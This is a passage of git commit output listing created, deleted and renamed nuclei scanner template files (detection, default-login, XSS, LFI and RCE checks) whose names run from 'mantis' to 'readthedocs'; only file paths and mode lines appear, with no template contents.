nuclei-templates/Other/mantis-detect-8780.yaml create mode 100644 nuclei-templates/Other/mantis-detect-8782.yaml delete mode 100644 nuclei-templates/Other/mapbox.yaml rename nuclei-templates/Other/{mashery-takeover-8786.yaml => mashery-takeover-8785.yaml} (100%) rename nuclei-templates/Other/{get.yaml => match-1.yaml} (100%) create mode 100644 nuclei-templates/Other/mcafee-epo-rce-8793.yaml delete mode 100644 nuclei-templates/Other/mcafee-epo-rce.yaml rename nuclei-templates/Other/{mdb-database-file-8796.yaml => mdb-database-file-8795.yaml} (100%) rename nuclei-templates/Other/{medium-takeover-8798.yaml => medium-takeover.yaml} (100%) rename nuclei-templates/Other/{memcached-stats.yaml => memcached-stats-8800.yaml} (100%) create mode 100644 nuclei-templates/Other/meshcentral-login-8801.yaml delete mode 100644 nuclei-templates/Other/meshcentral-login-8803.yaml create mode 100644 nuclei-templates/Other/metadata-alibaba-8807.yaml delete mode 100644 
nuclei-templates/Other/metadata-alibaba-8809.yaml create mode 100644 nuclei-templates/Other/metadata-aws-8810.yaml delete mode 100644 nuclei-templates/Other/metadata-aws.yaml create mode 100644 nuclei-templates/Other/metadata-azure-8813.yaml delete mode 100644 nuclei-templates/Other/metadata-azure-8815.yaml create mode 100644 nuclei-templates/Other/metadata-digitalocean-8818.yaml delete mode 100644 nuclei-templates/Other/metadata-digitalocean.yaml delete mode 100644 nuclei-templates/Other/metadata-google-8820.yaml create mode 100644 nuclei-templates/Other/metadata-google.yaml create mode 100644 nuclei-templates/Other/metadata-hetzner-8822.yaml delete mode 100644 nuclei-templates/Other/metadata-hetzner-8823.yaml delete mode 100644 nuclei-templates/Other/metadata-openstack-8827.yaml create mode 100644 nuclei-templates/Other/metadata-openstack.yaml delete mode 100644 nuclei-templates/Other/metadata-oracle-8830.yaml create mode 100644 nuclei-templates/Other/metadata-oracle-8831.yaml delete mode 100644 nuclei-templates/Other/microsoft-exchange-server-detect-8851.yaml create mode 100644 nuclei-templates/Other/microsoft-exchange-server-detect-8853.yaml rename nuclei-templates/Other/{microsoft-teams-webhook-8858.yaml => microsoft-teams-webhook.yaml} (100%) delete mode 100644 nuclei-templates/Other/microweber-detect-8863.yaml create mode 100644 nuclei-templates/Other/microweber-detect.yaml delete mode 100644 nuclei-templates/Other/microweber-xss-8864.yaml create mode 100644 nuclei-templates/Other/microweber-xss-8865.yaml create mode 100644 nuclei-templates/Other/mida-eframework-xss-8869.yaml delete mode 100644 nuclei-templates/Other/mida-eframework-xss.yaml rename nuclei-templates/Other/{mikrotik-graph-8870.yaml => mikrotik-graph-8871.yaml} (100%) delete mode 100644 nuclei-templates/Other/mikrotik-routeros-8873.yaml create mode 100644 nuclei-templates/Other/mikrotik-routeros-8875.yaml create mode 100644 nuclei-templates/Other/minimouse-lfi-8877.yaml delete mode 100644 
nuclei-templates/Other/minimouse-lfi.yaml delete mode 100644 nuclei-templates/Other/minio-default-login-8887.yaml create mode 100644 nuclei-templates/Other/minio-default-login.yaml delete mode 100644 nuclei-templates/Other/minio-default-password-8891.yaml create mode 100644 nuclei-templates/Other/minio-default-password.yaml rename nuclei-templates/Other/{mirai-unknown-rce-8898.yaml => mirai-unknown-rce-8899.yaml} (100%) create mode 100644 nuclei-templates/Other/misconfigured-docker-8900.yaml delete mode 100644 nuclei-templates/Other/misconfigured-docker.yaml delete mode 100644 nuclei-templates/Other/mobotix-guest-camera-8911.yaml create mode 100644 nuclei-templates/Other/mobotix-guest-camera.yaml create mode 100644 nuclei-templates/Other/moinmoin-detect-8916.yaml delete mode 100644 nuclei-templates/Other/moinmoin-detect-8917.yaml delete mode 100644 nuclei-templates/Other/monitorix-exposure-8932.yaml create mode 100644 nuclei-templates/Other/monitorix-exposure.yaml delete mode 100644 nuclei-templates/Other/moodle-changelog-8935.yaml create mode 100644 nuclei-templates/Other/moodle-changelog-8936.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi-8938.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-lfi-8941.yaml delete mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8944.yaml create mode 100644 nuclei-templates/Other/moodle-filter-jmol-xss-8945.yaml delete mode 100644 nuclei-templates/Other/moodle-xss-8951.yaml create mode 100644 nuclei-templates/Other/moodle-xss.yaml create mode 100644 nuclei-templates/Other/mpsec-lfi-8954.yaml delete mode 100644 nuclei-templates/Other/mpsec-lfi-8957.yaml delete mode 100644 nuclei-templates/Other/mrtg-detect-8958.yaml create mode 100644 nuclei-templates/Other/mrtg-detect-8959.yaml delete mode 100644 nuclei-templates/Other/ms-exchange-server-reflected-xss-8962.yaml create mode 100644 nuclei-templates/Other/ms-exchange-server-reflected-xss.yaml create mode 100644 
nuclei-templates/Other/msvod-sqli-8969.yaml delete mode 100644 nuclei-templates/Other/msvod-sqli.yaml delete mode 100644 nuclei-templates/Other/multiples-swagger-xss-indentify.yaml create mode 100644 nuclei-templates/Other/multipurpose.yaml create mode 100644 nuclei-templates/Other/music-store-open-redirect-8972.yaml delete mode 100644 nuclei-templates/Other/music-store-open-redirect.yaml delete mode 100644 nuclei-templates/Other/mx-service-detector-8975.yaml create mode 100644 nuclei-templates/Other/mx-service-detector.yaml rename nuclei-templates/Other/{my-chatbot-xss-8978.yaml => my-chatbot-xss-8979.yaml} (100%) create mode 100644 nuclei-templates/Other/mysql-native-password-8980.yaml delete mode 100644 nuclei-templates/Other/mysql-native-password.yaml create mode 100644 nuclei-templates/Other/myucms-lfr-8985.yaml delete mode 100644 nuclei-templates/Other/myucms-lfr-8987.yaml delete mode 100644 nuclei-templates/Other/nagios-default-login-8990.yaml create mode 100644 nuclei-templates/Other/nagios-default-login-8991.yaml create mode 100644 nuclei-templates/Other/nagios-status-page-3.yaml delete mode 100644 nuclei-templates/Other/nagios-status-page-8995.yaml create mode 100644 nuclei-templates/Other/nativechurch-wp-theme-lfd-8999.yaml delete mode 100644 nuclei-templates/Other/nativechurch-wp-theme-lfd-9002.yaml rename nuclei-templates/Other/{natshell-path-traversal-9008.yaml => natshell-path-traversal-9005.yaml} (100%) create mode 100644 nuclei-templates/Other/natshell-rce-9012.yaml delete mode 100644 nuclei-templates/Other/natshell-rce.yaml rename nuclei-templates/Other/{neos-detect.yaml => neos-detect-9013.yaml} (100%) delete mode 100644 nuclei-templates/Other/neos-panel-9016.yaml create mode 100644 nuclei-templates/Other/neos-panel.yaml rename nuclei-templates/Other/{nessus-panel-9017.yaml => nessus-panel-9019.yaml} (100%) create mode 100644 nuclei-templates/Other/netdata-dashboard-detected-9021.yaml delete mode 100644 
nuclei-templates/Other/netdata-dashboard-detected.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-ui-9023.yaml create mode 100644 nuclei-templates/Other/netflix-conductor-ui.yaml delete mode 100644 nuclei-templates/Other/netflix-conductor-version-9024.yaml create mode 100644 nuclei-templates/Other/netflix-conductor-version.yaml create mode 100644 nuclei-templates/Other/netflow-analyzer-zoho-traffic-management.yaml delete mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-9025.yaml create mode 100644 nuclei-templates/Other/netgear-router-auth-bypass-9026.yaml create mode 100644 nuclei-templates/Other/netis-router-9037.yaml delete mode 100644 nuclei-templates/Other/netis-router.yaml create mode 100644 nuclei-templates/Other/netlify-takeover-9043.yaml delete mode 100644 nuclei-templates/Other/netlify-takeover-9044.yaml rename nuclei-templates/Other/{Netoray-sqli.yaml => netoray-sqli.yaml} (100%) rename nuclei-templates/Other/{netrc-9046.yaml => netrc.yaml} (100%) create mode 100644 nuclei-templates/Other/netscaler-aaa-login-9050.yaml delete mode 100644 nuclei-templates/Other/netscaler-aaa-login.yaml create mode 100644 nuclei-templates/Other/netscaler-gateway-9052.yaml delete mode 100644 nuclei-templates/Other/netscaler-gateway-9055.yaml delete mode 100644 nuclei-templates/Other/netsurveillance-web-9057.yaml create mode 100644 nuclei-templates/Other/netsurveillance-web.yaml rename nuclei-templates/Other/{netsus-server-login-9061.yaml => netsus-server-login.yaml} (100%) create mode 100644 nuclei-templates/Other/netsweeper-open-redirect-9064.yaml delete mode 100644 nuclei-templates/Other/netsweeper-open-redirect.yaml create mode 100644 nuclei-templates/Other/netsweeper-webadmin-detect-9067.yaml delete mode 100644 nuclei-templates/Other/netsweeper-webadmin-detect.yaml create mode 100644 nuclei-templates/Other/news-flash.yaml create mode 100644 nuclei-templates/Other/newsletter-manager-open-redirect-9075.yaml delete mode 100644 
nuclei-templates/Other/newsletter-manager-open-redirect.yaml delete mode 100644 nuclei-templates/Other/newsletter-open-redirect-9078.yaml create mode 100644 nuclei-templates/Other/newsletter-open-redirect.yaml create mode 100644 nuclei-templates/Other/nextcloud-detect-9080.yaml delete mode 100644 nuclei-templates/Other/nextcloud-detect.yaml delete mode 100644 nuclei-templates/Other/nexus-default-login-9086.yaml create mode 100644 nuclei-templates/Other/nexus-default-login-9089.yaml create mode 100644 nuclei-templates/Other/nexus-detect-9094.yaml delete mode 100644 nuclei-templates/Other/nexus-detect-9095.yaml rename nuclei-templates/Other/{nginx-detect.yaml => nginx-Detect.yaml} (100%) create mode 100644 nuclei-templates/Other/nginx-config-9098.yaml delete mode 100644 nuclei-templates/Other/nginx-config-9099.yaml create mode 100644 nuclei-templates/Other/nginx-linux-page-9101.yaml delete mode 100644 nuclei-templates/Other/nginx-linux-page.yaml delete mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9106.yaml create mode 100644 nuclei-templates/Other/nginx-module-vts-xss-9108.yaml create mode 100644 nuclei-templates/Other/nginx-proxy-manager-9114.yaml delete mode 100644 nuclei-templates/Other/nginx-proxy-manager.yaml delete mode 100644 nuclei-templates/Other/nginx-version-9120.yaml create mode 100644 nuclei-templates/Other/nginx-version.yaml create mode 100644 nuclei-templates/Other/nginx_Misconfiguration.yaml create mode 100644 nuclei-templates/Other/ngrok-takeover-9126.yaml delete mode 100644 nuclei-templates/Other/ngrok-takeover.yaml delete mode 100644 nuclei-templates/Other/nifi-detech-9131.yaml create mode 100644 nuclei-templates/Other/nifi-detech.yaml create mode 100644 nuclei-templates/Other/ninjaform-open-redirect-9134.yaml delete mode 100644 nuclei-templates/Other/ninjaform-open-redirect.yaml create mode 100644 nuclei-templates/Other/node-integration-enabled-9137.yaml delete mode 100644 nuclei-templates/Other/node-integration-enabled.yaml create mode 
100644 nuclei-templates/Other/node-red-detect-9139.yaml delete mode 100644 nuclei-templates/Other/node-red-detect.yaml create mode 100644 nuclei-templates/Other/npm-log-file-9141.yaml delete mode 100644 nuclei-templates/Other/npm-log-file.yaml delete mode 100644 nuclei-templates/Other/npm.yaml delete mode 100644 nuclei-templates/Other/ns-asg-file-read-9152.yaml create mode 100644 nuclei-templates/Other/ns-asg-file-read-9153.yaml delete mode 100644 nuclei-templates/Other/ntlm-directories-9156.yaml create mode 100644 nuclei-templates/Other/ntlm-directories-9157.yaml delete mode 100644 nuclei-templates/Other/nuuno-network-login-9161.yaml create mode 100644 nuclei-templates/Other/nuuno-network-login-9164.yaml delete mode 100644 nuclei-templates/Other/nuuo-file-inclusion-9169.yaml create mode 100644 nuclei-templates/Other/nuuo-file-inclusion.yaml rename nuclei-templates/Other/{oa-tongda-path-traversal-9177.yaml => oa-tongda-path-traversal-9179.yaml} (100%) create mode 100644 nuclei-templates/Other/oa-v9-uploads-file-9189.yaml delete mode 100644 nuclei-templates/Other/oa-v9-uploads-file.yaml create mode 100644 nuclei-templates/Other/oauth-access-key-9184.yaml delete mode 100644 nuclei-templates/Other/oauth-access-key.yaml rename nuclei-templates/Other/{octobercms-default-login-9192.yaml => octobercms-default-login.yaml} (100%) create mode 100644 nuclei-templates/Other/octoprint-login-9197.yaml delete mode 100644 nuclei-templates/Other/octoprint-login.yaml rename nuclei-templates/Other/{odoo-cms-redirect-9201.yaml => odoo-cms-redirect.yaml} (100%) create mode 100644 nuclei-templates/Other/odoo-database-manager-9204.yaml delete mode 100644 nuclei-templates/Other/odoo-database-manager.yaml delete mode 100644 nuclei-templates/Other/ofbiz-default-login-9210.yaml create mode 100644 nuclei-templates/Other/ofbiz-default-login.yaml delete mode 100644 nuclei-templates/Other/office-documents-links.yaml create mode 100644 nuclei-templates/Other/officedocuments.yaml create mode 
100644 nuclei-templates/Other/officeweb365.yaml rename nuclei-templates/Other/{oidc-detect-9217.yaml => oidc-detect.yaml} (100%) delete mode 100644 nuclei-templates/Other/oipm-detect-9221.yaml create mode 100644 nuclei-templates/Other/oipm-detect.yaml delete mode 100644 nuclei-templates/Other/oki-data-9223.yaml create mode 100644 nuclei-templates/Other/oki-data-9226.yaml create mode 100644 nuclei-templates/Other/okta-panel-9231.yaml delete mode 100644 nuclei-templates/Other/okta-panel-9234.yaml delete mode 100644 nuclei-templates/Other/one_line_checks_nuclei.yaml create mode 100644 nuclei-templates/Other/onliner-multiple-bugs.yaml rename nuclei-templates/Other/{oob-header-based-interaction.yaml => oob-header-based-interaction-9249.yaml} (100%) create mode 100644 nuclei-templates/Other/oob-param-based-interaction-9252.yaml delete mode 100644 nuclei-templates/Other/oob-param-based-interaction-9253.yaml delete mode 100644 nuclei-templates/Other/opcache-status-exposure-9254.yaml create mode 100644 nuclei-templates/Other/opcache-status-exposure-9255.yaml delete mode 100644 nuclei-templates/Other/open-game-panel-9279.yaml create mode 100644 nuclei-templates/Other/open-game-panel.yaml rename nuclei-templates/Other/{open-proxy-internal-9289.yaml => open-proxy-internal-9290.yaml} (100%) delete mode 100644 nuclei-templates/Other/open-proxy-localhost-9292.yaml create mode 100644 nuclei-templates/Other/open-proxy-localhost.yaml delete mode 100644 nuclei-templates/Other/open-proxy-portscan-9295.yaml create mode 100644 nuclei-templates/Other/open-proxy-portscan.yaml delete mode 100644 nuclei-templates/Other/open-redirect-9308.yaml create mode 100644 nuclei-templates/Other/open-redirect-9312.yaml create mode 100644 nuclei-templates/Other/open-virtualization-manager-detect-9325.yaml delete mode 100644 nuclei-templates/Other/open-virtualization-manager-detect.yaml create mode 100644 nuclei-templates/Other/open-virtualization-manager-panel-9327.yaml delete mode 100644 
nuclei-templates/Other/open-virtualization-manager-panel.yaml create mode 100644 nuclei-templates/Other/openam-workflow-9258.yaml delete mode 100644 nuclei-templates/Other/openam-workflow-9259.yaml delete mode 100644 nuclei-templates/Other/openapi-2.yaml create mode 100644 nuclei-templates/Other/openapi.yaml delete mode 100644 nuclei-templates/Other/openbmcs-ssrf-9261.yaml create mode 100644 nuclei-templates/Other/openbmcs-ssrf.yaml delete mode 100644 nuclei-templates/Other/opencast-detect-9263.yaml create mode 100644 nuclei-templates/Other/opencast-detect-9265.yaml create mode 100644 nuclei-templates/Other/opencti-lfi-9268.yaml delete mode 100644 nuclei-templates/Other/opencti-lfi.yaml create mode 100644 nuclei-templates/Other/openemr-detect-9271.yaml delete mode 100644 nuclei-templates/Other/openemr-detect-9274.yaml delete mode 100644 nuclei-templates/Other/openerp-database-9277.yaml create mode 100644 nuclei-templates/Other/openerp-database.yaml create mode 100644 nuclei-templates/Other/openrefine.yaml create mode 100644 nuclei-templates/Other/opensis-detect-9313.yaml delete mode 100644 nuclei-templates/Other/opensis-detect-9314.yaml delete mode 100644 nuclei-templates/Other/opensis-lfi-9317.yaml create mode 100644 nuclei-templates/Other/opensis-lfi.yaml delete mode 100644 nuclei-templates/Other/opensns-rce-9320.yaml create mode 100644 nuclei-templates/Other/opensns-rce.yaml delete mode 100644 nuclei-templates/Other/openvpn-hhi-9329.yaml create mode 100644 nuclei-templates/Other/openvpn-hhi.yaml create mode 100644 nuclei-templates/Other/openweather.yaml create mode 100644 nuclei-templates/Other/openwrt-login-9333.yaml delete mode 100644 nuclei-templates/Other/openwrt-login.yaml rename nuclei-templates/Other/{optilink-ont1gew-gpon-rce.yaml => optilink-ont1gew-gpon-rce-9342.yaml} (100%) rename nuclei-templates/Other/{oracle-business-control-9347.yaml => oracle-business-control-9346.yaml} (100%) create mode 100644 
nuclei-templates/Other/oracle-dbass-detect-9350.yaml delete mode 100644 nuclei-templates/Other/oracle-dbass-detect-9351.yaml create mode 100644 nuclei-templates/Other/oracle-dbcs-9354.yaml delete mode 100644 nuclei-templates/Other/oracle-dbcs-9355.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-bispgraph-file-access-9356.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-bispgraph-file-access-9360.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-credentials-9366.yaml create mode 100644 nuclei-templates/Other/oracle-ebs-credentials.yaml rename nuclei-templates/Other/{oracle-ebs-sqllog-disclosure-9371.yaml => oracle-ebs-sqllog-disclosure-9370.yaml} (100%) create mode 100644 nuclei-templates/Other/oracle-ebs-xss-9376.yaml delete mode 100644 nuclei-templates/Other/oracle-ebs-xss-9377.yaml delete mode 100644 nuclei-templates/Other/oracle-fatwire-lfi-9378.yaml create mode 100644 nuclei-templates/Other/oracle-fatwire-lfi-9379.yaml create mode 100644 nuclei-templates/Other/oracle-http-server-12c-9382.yaml delete mode 100644 nuclei-templates/Other/oracle-http-server-12c-9384.yaml create mode 100644 nuclei-templates/Other/oracle-integrated-manager-9389.yaml delete mode 100644 nuclei-templates/Other/oracle-integrated-manager-9390.yaml rename nuclei-templates/Other/{oracle-iplanet-web-server.yaml => oracle-iplanet-web-server-9392.yaml} (100%) delete mode 100644 nuclei-templates/Other/oracle-people-enterprise-9394.yaml create mode 100644 nuclei-templates/Other/oracle-people-enterprise.yaml delete mode 100644 nuclei-templates/Other/oracle-people-sign-in-9399.yaml create mode 100644 nuclei-templates/Other/oracle-people-sign-in.yaml create mode 100644 nuclei-templates/Other/oracle-siebel-xss-9400.yaml delete mode 100644 nuclei-templates/Other/oracle-siebel-xss.yaml create mode 100644 nuclei-templates/Other/oracle-tns-listener.yaml delete mode 100644 nuclei-templates/Other/oracle-tns-listner.yaml delete mode 100644 
nuclei-templates/Other/orbiteam-bscw-server-lfi-9404.yaml create mode 100644 nuclei-templates/Other/orbiteam-bscw-server-lfi.yaml create mode 100644 nuclei-templates/Other/orchid-store.yaml create mode 100644 nuclei-templates/Other/oscommerce-rce-9405.yaml delete mode 100644 nuclei-templates/Other/oscommerce-rce.yaml delete mode 100644 nuclei-templates/Other/otobo-open-redirect-9409.yaml create mode 100644 nuclei-templates/Other/otobo-open-redirect-9410.yaml create mode 100644 nuclei-templates/Other/owasp-juice-shop-detected-9418.yaml delete mode 100644 nuclei-templates/Other/owasp-juice-shop-detected.yaml delete mode 100644 nuclei-templates/Other/owncloud-config-9420.yaml create mode 100644 nuclei-templates/Other/owncloud-config.yaml create mode 100644 nuclei-templates/Other/package-json-9422.yaml delete mode 100644 nuclei-templates/Other/package-json-9423.yaml create mode 100644 nuclei-templates/Other/pacsone-server-lfi-9428.yaml delete mode 100644 nuclei-templates/Other/pacsone-server-lfi-9429.yaml create mode 100644 nuclei-templates/Other/pagerduty.yaml delete mode 100644 nuclei-templates/Other/pagespeed-global-admin-9433.yaml create mode 100644 nuclei-templates/Other/pagespeed-global-admin.yaml delete mode 100644 nuclei-templates/Other/panabit-default-login-9437.yaml create mode 100644 nuclei-templates/Other/panabit-default-login-9438.yaml create mode 100644 nuclei-templates/Other/panabit-panalog.yaml create mode 100644 nuclei-templates/Other/panabit-panel-9444.yaml delete mode 100644 nuclei-templates/Other/panabit-panel-9445.yaml delete mode 100644 nuclei-templates/Other/panabit-sy_addmount-rce.yaml rename nuclei-templates/Other/{panalog-fileread.yaml => panalog-fileRead.yaml} (100%) delete mode 100644 nuclei-templates/Other/pandora-fms-console-9451.yaml create mode 100644 nuclei-templates/Other/pandora-fms-console.yaml create mode 100644 nuclei-templates/Other/panos-default-login-9454.yaml delete mode 100644 
nuclei-templates/Other/panos-default-login-9457.yaml delete mode 100644 nuclei-templates/Other/pantheon-takeover-9458.yaml create mode 100644 nuclei-templates/Other/pantheon-takeover-9459.yaml delete mode 100644 nuclei-templates/Other/parallels-html-client-9462.yaml create mode 100644 nuclei-templates/Other/parallels-html-client-9464.yaml create mode 100644 nuclei-templates/Other/parentlink-xss-9466.yaml delete mode 100644 nuclei-templates/Other/parentlink-xss-9467.yaml delete mode 100644 nuclei-templates/Other/path-traversal.yaml rename nuclei-templates/Other/{paypal-braintree-token-11856.yaml => paypal-braintree-token(1).yaml} (100%) delete mode 100644 nuclei-templates/Other/pbootcms-database-file-download-9469.yaml create mode 100644 nuclei-templates/Other/pbootcms-database-file-download.yaml create mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce-9471.yaml delete mode 100644 nuclei-templates/Other/pdf-signer-ssti-to-rce.yaml rename nuclei-templates/Other/{pentaho-default-login-9480.yaml => pentaho-default-login-9478.yaml} (100%) create mode 100644 nuclei-templates/Other/phalcon-framework-source-9494.yaml delete mode 100644 nuclei-templates/Other/phalcon-framework-source-9495.yaml delete mode 100644 nuclei-templates/Other/php-backup-files-9498.yaml create mode 100644 nuclei-templates/Other/php-backup-files.yaml delete mode 100644 nuclei-templates/Other/php-errors-9511.yaml create mode 100644 nuclei-templates/Other/php-errors.yaml delete mode 100644 nuclei-templates/Other/php-ini-9524.yaml create mode 100644 nuclei-templates/Other/php-ini.yaml rename nuclei-templates/Other/{php-proxy-detect-1.yaml => php-proxy-detect-9544.yaml} (100%) delete mode 100644 nuclei-templates/Other/php-timeclock-xss-9552.yaml create mode 100644 nuclei-templates/Other/php-timeclock-xss.yaml rename nuclei-templates/Other/{php-user-ini-disclosure-9559.yaml => php-user-ini-disclosure-9561.yaml} (100%) delete mode 100644 nuclei-templates/Other/php-zerodium-backdoor-rce-9570.yaml 
create mode 100644 nuclei-templates/Other/php-zerodium-backdoor-rce-9572.yaml delete mode 100644 nuclei-templates/Other/phpMyAdmin-setup.yaml delete mode 100644 nuclei-templates/Other/phpcollab-workflow-9502.yaml create mode 100644 nuclei-templates/Other/phpcollab-workflow.yaml delete mode 100644 nuclei-templates/Other/phpinfo-9519.yaml create mode 100644 nuclei-templates/Other/phpinfo-files.yaml create mode 100644 nuclei-templates/Other/phpmyadmin-panel-9525.yaml delete mode 100644 nuclei-templates/Other/phpmyadmin-panel-9526.yaml delete mode 100644 nuclei-templates/Other/phpmyadmin-server-import.yaml create mode 100644 nuclei-templates/Other/phpmyadmin-setup-11857.yaml delete mode 100644 nuclei-templates/Other/phpunit-9557.yaml create mode 100644 nuclei-templates/Other/phpunit-9558.yaml rename nuclei-templates/Other/{phpwiki-lfi-9566.yaml => phpwiki-lfi-9564.yaml} (100%) create mode 100644 nuclei-templates/Other/pi-hole-detect-9582.yaml delete mode 100644 nuclei-templates/Other/pi-hole-detect-9583.yaml delete mode 100644 nuclei-templates/Other/pictatic-api-key-9576.yaml create mode 100644 nuclei-templates/Other/pictatic-api-key.yaml create mode 100644 nuclei-templates/Other/pieregister-open-redirect-9577.yaml delete mode 100644 nuclei-templates/Other/pieregister-open-redirect-9578.yaml create mode 100644 nuclei-templates/Other/pieregister-plugin-open-redirect.yaml create mode 100644 nuclei-templates/Other/plastic-scm-login-9593.yaml delete mode 100644 nuclei-templates/Other/plastic-scm-login.yaml rename nuclei-templates/Other/{plesk-obsidian-9594.yaml => plesk-obsidian-9596.yaml} (100%) delete mode 100644 nuclei-templates/Other/plesk-onyx-9601.yaml create mode 100644 nuclei-templates/Other/plesk-onyx-login.yaml rename nuclei-templates/Other/{plesk-stat-9604.yaml => plesk-stat-9603.yaml} (100%) create mode 100644 nuclei-templates/Other/plone-cms-detect-9606.yaml delete mode 100644 nuclei-templates/Other/plone-cms-detect.yaml create mode 100644 
nuclei-templates/Other/pma-server-import.yaml delete mode 100644 nuclei-templates/Other/pmb-directory-traversal-9612.yaml create mode 100644 nuclei-templates/Other/pmb-directory-traversal-9613.yaml delete mode 100644 nuclei-templates/Other/pmb-local-file-disclosure-9617.yaml create mode 100644 nuclei-templates/Other/pmb-local-file-disclosure.yaml create mode 100644 nuclei-templates/Other/pollbot-redirect-9623.yaml delete mode 100644 nuclei-templates/Other/pollbot-redirect.yaml rename nuclei-templates/Other/{polycom-login-9625.yaml => polycom-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/portainer-init-deploy-9628.yaml create mode 100644 nuclei-templates/Other/portainer-init-deploy-9633.yaml create mode 100644 nuclei-templates/Other/postmark.yaml rename nuclei-templates/Other/{postmessage-tracker-9640.yaml => postmessage-tracker.yaml} (100%) create mode 100644 nuclei-templates/Other/powercreator-cms-rce-9644.yaml delete mode 100644 nuclei-templates/Other/powercreator-cms-rce-9647.yaml create mode 100644 nuclei-templates/Other/powerlogic-ion-9650.yaml delete mode 100644 nuclei-templates/Other/powerlogic-ion.yaml rename nuclei-templates/Other/{private-key.yaml => private-key-9655.yaml} (100%) create mode 100644 nuclei-templates/Other/processmaker-lfi-9662.yaml delete mode 100644 nuclei-templates/Other/processmaker-lfi.yaml delete mode 100644 nuclei-templates/Other/proftpd-config-9667.yaml create mode 100644 nuclei-templates/Other/proftpd-config.yaml create mode 100644 nuclei-templates/Other/prometheus-config-9673.yaml delete mode 100644 nuclei-templates/Other/prometheus-config.yaml create mode 100644 nuclei-templates/Other/prometheus-exporter-9678.yaml create mode 100644 nuclei-templates/Other/prometheus-exporter-detect-9676.yaml delete mode 100644 nuclei-templates/Other/prometheus-exporter-detect.yaml delete mode 100644 nuclei-templates/Other/prometheus-exporter.yaml create mode 100644 nuclei-templates/Other/prometheus-exposed-panel-9684.yaml delete 
mode 100644 nuclei-templates/Other/prometheus-exposed-panel.yaml delete mode 100644 nuclei-templates/Other/prometheus-flags-9687.yaml create mode 100644 nuclei-templates/Other/prometheus-flags.yaml create mode 100644 nuclei-templates/Other/proposify-takeover-9693.yaml delete mode 100644 nuclei-templates/Other/proposify-takeover.yaml rename nuclei-templates/Other/{prtg-detect.yaml => prtg-detect-9706.yaml} (100%) delete mode 100644 nuclei-templates/Other/pulse-secure-panel-9714.yaml create mode 100644 nuclei-templates/Other/pulse-secure-panel-9715.yaml create mode 100644 nuclei-templates/Other/puppet-node-manager-detect-9720.yaml delete mode 100644 nuclei-templates/Other/puppet-node-manager-detect.yaml rename nuclei-templates/Other/{puppetserver-detect-9722.yaml => puppetserver-detect-9721.yaml} (100%) create mode 100644 nuclei-templates/Other/put-m-enb.yaml delete mode 100644 nuclei-templates/Other/put-method-enabled-9728.yaml delete mode 100644 nuclei-templates/Other/pyspider-unauthorized-access-9743.yaml create mode 100644 nuclei-templates/Other/pyspider-unauthorized-access.yaml delete mode 100644 nuclei-templates/Other/python-app-sql-exceptions-9744.yaml create mode 100644 nuclei-templates/Other/python-app-sql-exceptions.yaml rename nuclei-templates/Other/{python-metrics-9745.yaml => python-metrics-9747.yaml} (100%) create mode 100644 nuclei-templates/Other/qdpm-info-leak-9753.yaml delete mode 100644 nuclei-templates/Other/qdpm-info-leak.yaml delete mode 100644 nuclei-templates/Other/qi-anxin-netkang-next-generation-firewall-rce-9759.yaml create mode 100644 nuclei-templates/Other/qi-anxin-netkang-next-generation-firewall-rce-9761.yaml rename nuclei-templates/Other/{qihang-media-upload_all.yaml => qihang-media-upload.yaml} (100%) rename nuclei-templates/Other/{qizhi-login-byPass.yaml => qizhi-login-bypass.yaml} (100%) delete mode 100644 nuclei-templates/Other/rabbitmq-dashboard-9778.yaml create mode 100644 nuclei-templates/Other/rabbitmq-dashboard.yaml rename 
nuclei-templates/Other/{rabbitmq-default-admin.yaml => rabbitmq-default-admin-9780.yaml} (100%) rename nuclei-templates/Other/{rabbitmq-default-login-9786.yaml => rabbitmq-default-login-9783.yaml} (100%) delete mode 100644 nuclei-templates/Other/race-multiple.yaml create mode 100644 nuclei-templates/Other/race-simple.yaml delete mode 100644 nuclei-templates/Other/rack-mini-profiler-9793.yaml create mode 100644 nuclei-templates/Other/rack-mini-profiler.yaml delete mode 100644 nuclei-templates/Other/radius-manager-9795.yaml create mode 100644 nuclei-templates/Other/radius-manager.yaml rename nuclei-templates/Other/{rails-database-config-9802.yaml => rails-database-config-9804.yaml} (100%) create mode 100644 nuclei-templates/Other/rails-debug-mode-9807.yaml delete mode 100644 nuclei-templates/Other/rails-debug-mode.yaml delete mode 100644 nuclei-templates/Other/rails6-xss-9797.yaml create mode 100644 nuclei-templates/Other/rails6-xss-9800.yaml create mode 100644 nuclei-templates/Other/rancher-panel-9817.yaml delete mode 100644 nuclei-templates/Other/rancher-panel.yaml create mode 100644 nuclei-templates/Other/ranger-default-login-9828.yaml delete mode 100644 nuclei-templates/Other/ranger-default-login.yaml delete mode 100644 nuclei-templates/Other/ranger-detection-9829.yaml create mode 100644 nuclei-templates/Other/ranger-detection.yaml create mode 100644 nuclei-templates/Other/raw-get.yaml delete mode 100644 nuclei-templates/Other/rce-cve-2021-41773.yaml create mode 100644 nuclei-templates/Other/rconfig-rce-9836.yaml delete mode 100644 nuclei-templates/Other/rconfig-rce-9837.yaml delete mode 100644 nuclei-templates/Other/rdf-user-enumeration.yaml delete mode 100644 nuclei-templates/Other/readme-takeover-9841.yaml create mode 100644 nuclei-templates/Other/readme-takeover.yaml delete mode 100644 nuclei-templates/Other/readthedocs-takeover-9846.yaml create mode 100644 nuclei-templates/Other/readthedocs-takeover-9847.yaml create mode 100644 
